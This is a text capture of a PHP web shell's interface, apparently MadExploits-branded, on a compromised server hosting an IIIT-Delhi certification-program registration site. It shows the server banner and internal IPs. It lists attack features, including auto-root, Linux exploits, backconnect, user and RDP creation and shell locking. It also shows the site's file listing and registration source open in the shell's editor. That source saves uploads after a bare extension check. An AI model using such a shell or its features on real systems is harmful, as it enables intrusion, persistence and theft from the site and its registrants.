Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
applications /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
mailer-old
[ DIR ]
drwxr-xr-x
phpmailer_manual_setup
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxrwxr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user-ankittill30725.php
5.29
KB
-rw-r--r--
class.user.php
5.9
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
282
B
-rw-r--r--
dashboard.php
5.13
KB
-rw-r--r--
dbconfig.php
1.29
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
4.94
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
index.php
5.86
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.34
KB
-rw-r--r--
personalInformations-oldofcsed...
24.15
KB
-rw-r--r--
personalInformations.php
1
KB
-rw-r--r--
register-ankittill30725.php
16.12
KB
-rw-r--r--
register-nandini.php
14.88
KB
-rw-r--r--
register-originaltill29725.php
16.71
KB
-rw-r--r--
register.php
15.72
KB
-rw-r--r--
registrationVerify.php
2.46
KB
-rw-r--r--
resetpass.php
5.26
KB
-rw-r--r--
test-error.php
430
B
-rw-r--r--
testmail1.php
1.1
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.6
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : register-originaltill29725.php
<?php session_start(); require_once 'class.user.php'; $reg_user = new USER(); if ( $reg_user->is_logged_in() != "" ) { $reg_user->redirect( 'personalInformations.php' ); } if ( isset( $_POST[ 'btn-signup' ] ) ) { $title = trim( $_POST[ 'title' ] ); $studentName1 = trim( $_POST[ 'studentName' ] ); $studentName= $title . " " . $studentName1; $studentEmail = trim( $_POST[ 'studentEmail' ] ); $studentMobile = trim( $_POST[ 'studentMobile' ] ); $institutionName = trim( $_POST[ 'institutionName' ] ); $anyothervalue = trim( $_POST[ 'anyothervalue' ] ); $yourTitle = trim( $_POST[ 'yourTitle' ] ); $yourTitle .= $anyothervalue; $areasofinterest = trim( $_POST[ 'areasofinterest' ] ); $areasofinteresthe = trim( $_POST[ 'areasofinteresthe' ] ); $url = trim( $_POST[ 'url' ] ); $password = trim( $_POST[ 'password' ] ); //$photo = trim( $_POST[ 'photo' ] ); $tokenCode = md5( uniqid( rand() ) ); //upload file $filename1 = $_FILES['photo']['name']; //echo "Hi..."; $photo1 = $_FILES['photo']['name']; //echo $photo = "immm.jpg"; $ext3 = pathinfo( $photo1, PATHINFO_EXTENSION ); $allowed3 = array( 'png', 'jpg', 'jpeg' ); //check if file type is valid if ( in_array( $ext3, $allowed3 ) ) { /*$sql3 = $DB_con->prepare( "select studentID from studentregistration where studentID='$studentID'" ); $sql3->execute(); if ( count( $sql3 ) > 0 ) { $result3 = $sql3->fetch( PDO::FETCH_ASSOC ) ; $photo1 = ( $result3[ 'studentID' ] ) . '-' . $photo1; } else $photo1 = '1' . '-' . $photo1;*/ $photo1 = $studentMobile . '-' . $photo1; //set target directory $path3 = 'uploadDoc/'; // $created = @date('Y-m-d H:i:s'); //move_uploaded_file( $_FILES[ 'photo' ][ 'tmp_name' ], ( $path3 . $photo1 ) ); if (move_uploaded_file( $_FILES[ 'photo' ][ 'tmp_name' ], ( $path3 . $photo1 ) )) { if($photo =='NULL'){ $photo="Not Uploaded"; } else { $photo=$photo1; } //echo "The file ". htmlspecialchars( basename( $_FILES["photo"]["name"])). " has been uploaded."; } else { echo "Sorry, there is an error uploading your file."; } } $stmt = $reg_user->runQuery( "SELECT * FROM studentregistration WHERE studentEmail=:studentEmail" ); $stmt->execute( array( ":studentEmail" => $studentEmail ) ); $row = $stmt->fetch( PDO::FETCH_ASSOC ); if ( $stmt->rowCount() > 0 ) { $msg = " <div class='alert alert-error'> <button class='close' data-dismiss='alert'>×</button> <strong>Sorry !</strong> This email id is already exists in our database, Please Try through another one. </div> "; } else { if ( $reg_user->register( $studentName, $studentEmail, $studentMobile, $institutionName, $areasofinterest, $areasofinteresthe, $yourTitle, $url, $password, $photo, $tokenCode ) ) { $studentID = $reg_user->lasdID(); $key = base64_encode( $studentID ); $studentID = $key; $message = " Hello $studentName, <br /><br /> Welcome to iPD-CP, IIIT-Delhi !<br/> <br /><br/> Thanks, iPD-CP, IIIT-Delhi Team"; $subject = "Registration Confirmation for iPD-CP, IIIT-Delhi"; $reg_user->send_mail( $studentEmail, $message, $subject ); $msg = " <div class='alert alert-success'> <button class='close' data-dismiss='alert'>×</button> <strong>Success!</strong> We've sent an email to $studentEmail. Please click on the confirmation link in the email to activate your account. </div> "; ?> <script> alert ("Thanks for registration to iPD-CP, IIIT-Delhi"); window.location.href='https://cipd.iiitd.ac.in'; </script> <?php } else { echo "Sorry, Query could not execute..."; } } } ?> <!DOCTYPE html> <html> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Intelligent Product Development - Certification Program (iPD-CP), IIIT-Delhi</title> <!-- Tell the browser to be responsive to screen width --> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <!-- Bootstrap 3.3.7 --> <link rel="stylesheet" href="bower_components/bootstrap/dist/css/bootstrap.min.css"> <!-- Font Awesome --> <link rel="stylesheet" href="bower_components/font-awesome/css/font-awesome.min.css"> <!-- Ionicons --> <link rel="stylesheet" href="bower_components/Ionicons/css/ionicons.min.css"> <!-- Theme style --> <link rel="stylesheet" href="dist/css/AdminLTE.min.css"> <!-- iCheck --> <link rel="stylesheet" href="plugins/iCheck/square/blue.css"> <!-- TODO: Missing CoffeeScript 2 --> <script type="text/javascript" src="https://code.jquery.com/jquery-1.10.1.js"></script> <script type="text/javascript">//<![CDATA[ $(window).load(function(){ $('#password, #confirm_password').on('keyup', function () { if ($('#password').val() == $('#confirm_password').val()) { $('#message').html('Password matching..').css('color', 'green'); } else $('#message').html('Password not matching..').css('color', 'red'); }); }); //]]></script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> <!-- Google Font --> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic"> </head> <body class="hold-transition register-page"> <div class="register-box" style="width: 800px"> <div class="register-logo"> <a href="index.php" style="color:#FFFFFF;"><strong>Intelligent Product Development - Certification Program (iPD-CP)</strong></a> </div> <div class="register-box-body"> <p class="login-box-msg"><strong>Register here for admisison <!--(your name, affiliation, photo, and area of research interest will be posted on the website. Other details will not be shared.)--></strong></p> <?php // if(isset($msg)) echo $msg; ?> <!-- Commented on 30 june 2025 as per dr jalote's request--> <form class="form-signin" method="post" enctype="multipart/form-data"> <div class="row"> <div class="col-md-6"> <div class="form-group has-feedback"> <label><strong>Title <span style="color:#ff0000;">*</span></strong></label> <select name="title" class="form-control select2" required> <option value="Select">--Select--</option> <option value="Prof.">Prof.</option> <option value="Dr.">Dr.</option> <option value="Mr.">Mr.</option> <option value="Ms.">Ms.</option> </select> </div> <div class="form-group has-feedback"> <label><strong>Name <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="studentName" class="form-control" placeholder="Full name" maxlength="50" required> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Email <span style="color:#ff0000;">*</span></strong></label> <input type="email" class="form-control" name="studentEmail" placeholder="Email" required autocomplete="off" maxlength="50"> <span class="glyphicon glyphicon-envelope form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Mobile Number <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="studentMobile" class="form-control" placeholder="Mobile No." required maxlength="11"> <span class="glyphicon glyphicon-phone form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Organization <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="institutionName" id="institutionName" class="form-control" placeholder="Name of the Organization for which working" > <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <!--<div class="form-group has-feedback"> <label>Department</label> <select name="department" class="form-control select2"> <option value="Select">--Select--</option> <option value="CS">CS</option> <option value="IT">IT</option> <option value="EE">EE</option> <option value="Other">Other</option> </select> </div>--> <!-- <div class="form-group has-feedback"> <label><strong>Your Department</strong></label> <input type="text" name="areasofinterest" class="form-control" placeholder="Your Department" maxlength="50" required> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> --> <div class="form-group has-feedback"> <label><strong>Latest CV (.pdf) <span style="color:#ff0000;">*</span></strong></label> <input type="file" class="form-control" id="lcv" name="lcv" placeholder="Latest CV" accept=".pdf" autocomplete="off"> <!-- <span class="glyphicon glyphicon-user form-control-feedback"></span> --> </div> </div> <div class="col-md-6"> <!--<div class="form-group has-feedback"> <label>Institution Type</label> <select name="institutionType" class="form-control select2"> <option value="Select">--Select--</option> <option value="Private College">Private College</option> <option value="Government College">Government College</option> <option value="Private University/Institution">Private University/Institution</option> <option value="State University/Institution">State University/Institution</option> <option value="Central University/Institution">Central University/Institution</option> </select> </div>--> <div class="form-group has-feedback"> <label><strong>Domain <span style="color:#ff0000;">*</span></strong></label> <select name="yourTitle" class="form-control select2" id="slct"> <option value="Select">--Select--</option> <option value="Design">Design</option> <option value="Entrepreneurship">Entrepreneurship</option> <option value="Electronics">Electronics</option> <option value="Computer Science">Computer Science</option> <option value="Product">Product</option> <!-- <option value="Other Student">Other Student</option> <option value="Any other">Any other</option> --> </select> </div> <div id="container"></div> <div class="form-group has-feedback"> <label><strong>Sub Domain <span style="color:#ff0000;">*</span></strong></label> <select name="subdomain" class="form-control select2" id="subd"> <option value="Select">--Select--</option> </select> </div> <div class="form-group has-feedback"> <label><strong>Total years of experience in selected subdomain (In Years) <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="areasofinteresthe" class="form-control" placeholder="Total years of experience in selected subdomain" maxlength="1000" required> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Your LinkedIn Profile Link <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="url" class="form-control" placeholder="Your LinkedIn Profile Link" maxlength="100" required> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Your Website Link (Optional)</strong></label> <input type="text" name="url" class="form-control" placeholder="Your website link if any" maxlength="100" required> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Password <span style="color:#ff0000;">*</span></strong></label> <input type="password" id="password" name="password" class="form-control" placeholder="Password" required autocomplete="off"> <span class="glyphicon glyphicon-lock form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Confirm Password <span style="color:#ff0000;">*</span></strong></label> <input type="password" class="form-control" id="confirm_password" name="confirm_password" placeholder="Retype password" required autocomplete="off"> <span class="glyphicon glyphicon-log-in form-control-feedback"></span> </div> <!-- <div class="form-group has-feedback"> <label><strong>Recent Photo (.jpg)</strong></label> <input type="file" class="form-control" id="photo" name="photo" placeholder="Recent Photo" accept="image/jpeg" autocomplete="off"> </div> --> <!--<div class="row"> <div class="col-xs-8"> <a href="index.php" class="text-center"><strong>Sign in if you have already registered.</strong></a> <div class="checkbox icheck"> <label> <span id='message'></span> </label> </div> </div> <div class="col-xs-4"> <button type="submit" class="btn btn-primary btn-block btn-flat" name="btn-signup">Submit</button> </div> </div>--> </div> </div> <div class="row"> <div class="col-xs-10"> <a href="index.php" class="text-center"><strong>Sign in if you have already registered.</strong></a> <div class="checkbox icheck"> <label> <span id='message'></span> </label> </div> </div> <!-- /.col --> <div class="col-xs-2"> <button type="submit" class="btn btn-primary btn-block btn-flat" name="btn-signup">Submit</button> </div> <!-- /.col --> </div> <!--<div class="row"> <div class="col-xs-12"> <strong>Note: Your name, Affiliation, Photo, and Interests will be posted on the website. Other details will not be shared.</strong> <div class="checkbox icheck"> <label> <span id='message'></span> </label> </div> </div> </div>--> </form> <!-- <div class="social-auth-links text-center"> <p>- OR -</p> <a href="#" class="btn btn-block btn-social btn-facebook btn-flat"><i class="fa fa-facebook"></i> Sign up using Facebook</a> <a href="#" class="btn btn-block btn-social btn-google btn-flat"><i class="fa fa-google-plus"></i> Sign up using Google+</a> </div>--> </div> <!-- /.form-box --> </div> <!-- /.register-box --> <!-- jQuery 3 --> <script src="bower_components/jquery/dist/jquery.min.js"></script> <!-- Bootstrap 3.3.7 --> <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- iCheck --> <script src="plugins/iCheck/icheck.min.js"></script> <script> $(function () { $('input').iCheck({ checkboxClass: 'icheckbox_square-blue', radioClass: 'iradio_square-blue', increaseArea: '20%' /* optional */ }); }); </script> <script type="text/javascript"> $(document).ready(function () { $('#slct').change(function () { var value = $(this).val(); var toAppend = ''; if (value == 'Any other') { toAppend = "<input type='textbox' name='anyothervalue' id='anyothervalue' >"; $("#container").html(toAppend); return; } }); }); </script> </body> </html>
Close